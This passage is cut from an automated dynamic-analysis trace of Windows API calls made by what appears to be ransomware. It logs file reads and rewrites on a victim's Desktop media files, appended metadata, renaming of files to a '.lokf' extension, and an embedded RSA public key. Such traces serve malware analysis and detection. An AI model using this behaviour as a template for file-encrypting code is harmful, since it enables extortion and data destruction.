out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0058.585] GetLastError () returned 0x0 [0058.586] CryptDestroyHash (hHash=0x327cb80) returned 1 [0058.586] CryptReleaseContext (hProv=0x6b89c8, dwFlags=0x0) returned 1 [0058.586] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0058.586] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0058.586] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0058.586] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.586] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0058.586] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0058.586] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.586] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x12200) returned 0x9c82710 [0058.586] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0058.586] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0058.586] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0058.586] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.586] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0058.586] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0058.586] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3298ec0 [0058.586] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6aed8 [0058.586] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3298f08 [0058.586] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6aef0 [0058.586] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6af20 [0058.586] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad10 [0058.586] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6af38 [0058.586] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0058.586] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0058.586] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0058.587] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0058.587] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6af20 | out: hHeap=0x660000) returned 1 [0058.587] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6af38 | out: hHeap=0x660000) returned 1 [0058.587] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0058.587] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0058.587] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0058.587] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad10 [0058.587] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f60 [0058.587] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6af38 [0058.587] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0058.587] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c6af20 [0058.587] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f10 [0058.587] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x326a688 [0058.587] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0058.587] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0058.587] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0058.587] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0058.587] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x32425c8 [0058.587] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0058.587] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a688 | out: hHeap=0x660000) returned 1 [0058.587] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6af38 | out: hHeap=0x660000) returned 1 [0058.587] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0058.587] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6af20 | out: hHeap=0x660000) returned 1 [0058.587] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0058.587] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0058.587] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0058.587] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0058.587] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296380 | out: hHeap=0x660000) returned 1 [0058.587] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0058.587] GetCurrentThreadId () returned 0x9e0 [0058.587] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326a688 [0058.587] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x6c31a0 [0058.587] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0058.587] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0058.587] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0058.587] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0058.588] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0058.588] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x3234418 [0058.588] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.588] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.588] GetCurrentThreadId () returned 0x9e0 [0058.588] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.588] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.588] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0058.588] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.588] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.588] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.588] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.588] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0058.588] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x3292fe8 [0058.588] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0058.588] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261058 [0058.588] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0058.588] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x3282810 [0058.588] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0058.588] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad10 [0058.588] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0058.588] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0058.588] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0058.588] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0058.588] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0058.588] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0058.588] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0058.588] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0058.588] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6af20 [0058.588] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0058.588] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f20 [0058.588] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0058.588] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0058.588] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0058.588] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0058.589] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0058.589] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6af38 [0058.589] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0058.589] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0058.589] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0058.589] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6af08 [0058.589] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0058.589] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6acc8 [0058.589] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0058.589] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f30 [0058.589] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0058.589] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac68 [0058.589] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0058.589] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad40 [0058.589] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0058.589] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6af50 [0058.589] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0058.589] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6ac68 [0058.589] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad40 | out: hHeap=0x660000) returned 1 [0058.589] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f50 [0058.589] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0058.589] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0058.589] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0058.589] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0058.589] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6af20 | out: hHeap=0x660000) returned 1 [0058.589] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6af20 [0058.589] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0058.589] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c711f0 [0058.589] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0058.589] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0058.589] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0058.589] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x32947b0 [0058.589] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0058.589] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x3296fa8 [0058.589] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0058.589] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x32453f0 [0058.589] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6af20 | out: hHeap=0x660000) returned 1 [0058.590] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x32949c8 [0058.590] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0058.590] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x32679f8 [0058.590] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0058.590] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b89c8 | out: hHeap=0x660000) returned 1 [0058.590] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3292fe8 | out: hHeap=0x660000) returned 1 [0058.590] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32679f8 | out: hHeap=0x660000) returned 1 [0058.590] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0058.590] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32453f0 | out: hHeap=0x660000) returned 1 [0058.590] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0058.590] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32949c8 | out: hHeap=0x660000) returned 1 [0058.590] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296fa8 | out: hHeap=0x660000) returned 1 [0058.590] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0058.590] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6af50 | out: hHeap=0x660000) returned 1 [0058.590] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0058.590] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0058.590] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0058.590] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6af38 | out: hHeap=0x660000) returned 1 [0058.590] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6af08 | out: hHeap=0x660000) returned 1 [0058.590] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201228 | out: hHeap=0x660000) returned 1 [0058.590] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0058.590] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0058.590] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6aef0 | out: hHeap=0x660000) returned 1 [0058.590] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3298f08 | out: hHeap=0x660000) returned 1 [0058.590] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0058.590] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3282810 | out: hHeap=0x660000) returned 1 [0058.590] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261058 | out: hHeap=0x660000) returned 1 [0058.590] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32452d8 | out: hHeap=0x660000) returned 1 [0058.590] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242688 | out: hHeap=0x660000) returned 1 [0058.590] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0058.590] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0058.591] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0058.591] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0058.591] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0058.591] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32995a0 | out: hHeap=0x660000) returned 1 [0058.591] WriteFile (in: hFile=0x5cc, lpBuffer=0x9c82710*, nNumberOfBytesToWrite=0x121fb, lpNumberOfBytesWritten=0x9f4fb14, lpOverlapped=0x0 | out: lpBuffer=0x9c82710*, lpNumberOfBytesWritten=0x9f4fb14*=0x121fb, lpOverlapped=0x0) returned 1 [0058.591] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c82710 | out: hHeap=0x660000) returned 1 [0058.591] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x12200, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.591] WriteFile (in: hFile=0x5cc, lpBuffer=0x326a688*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326a688*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0058.591] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a688 | out: hHeap=0x660000) returned 1 [0058.591] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bc70 [0058.591] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x428) returned 0x32947b0 [0058.591] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x32947b0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 41 [0058.591] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x430) returned 0x3297a68 [0058.591] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0058.591] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bc70 | out: hHeap=0x660000) returned 1 [0058.591] WriteFile (in: hFile=0x5cc, lpBuffer=0x3297a68*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x3297a68*, lpNumberOfBytesWritten=0x9f4fb50*=0x28, lpOverlapped=0x0) returned 1 [0058.591] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0058.591] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0058.591] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0058.592] CloseHandle (hObject=0x5cc) returned 1 [0058.592] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0058.592] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x890) returned 0x3268798 [0058.592] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b89c8 | out: hHeap=0x660000) returned 1 [0058.592] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\H 5zj6wBswdjjTMij-.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\h 5zj6wbswdjjtmij-.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\H 5zj6wBswdjjTMij-.mp3.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\h 5zj6wbswdjjtmij-.mp3.lokf")) returned 1 [0058.593] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.593] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0058.593] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.594] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a50 | out: hHeap=0x660000) returned 1 [0058.594] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88bab7e0, ftCreationTime.dwHighDateTime=0x1d4c83f, ftLastAccessTime.dwLowDateTime=0xedf42820, ftLastAccessTime.dwHighDateTime=0x1d4c8a4, ftLastWriteTime.dwLowDateTime=0xedf42820, ftLastWriteTime.dwHighDateTime=0x1d4c8a4, nFileSizeHigh=0x0, nFileSizeLow=0xc514, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="h5XCQ.mkv", cAlternateFileName="")) returned 1 [0058.594] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0058.594] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x76) returned 0x3289860 [0058.594] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261058 | out: hHeap=0x660000) returned 1 [0058.594] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h5XCQ.mkv") returned=".mkv" [0058.594] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h5XCQ.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\h5xcq.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0058.594] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=50452) returned 1 [0058.594] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0058.596] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xc4ee, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.597] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0058.597] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.597] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0058.597] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0058.597] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xc514, lpOverlapped=0x0) returned 1 [0058.598] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.598] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0058.598] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.598] lstrlenA (lpString="-----BEGIN PUBLIC 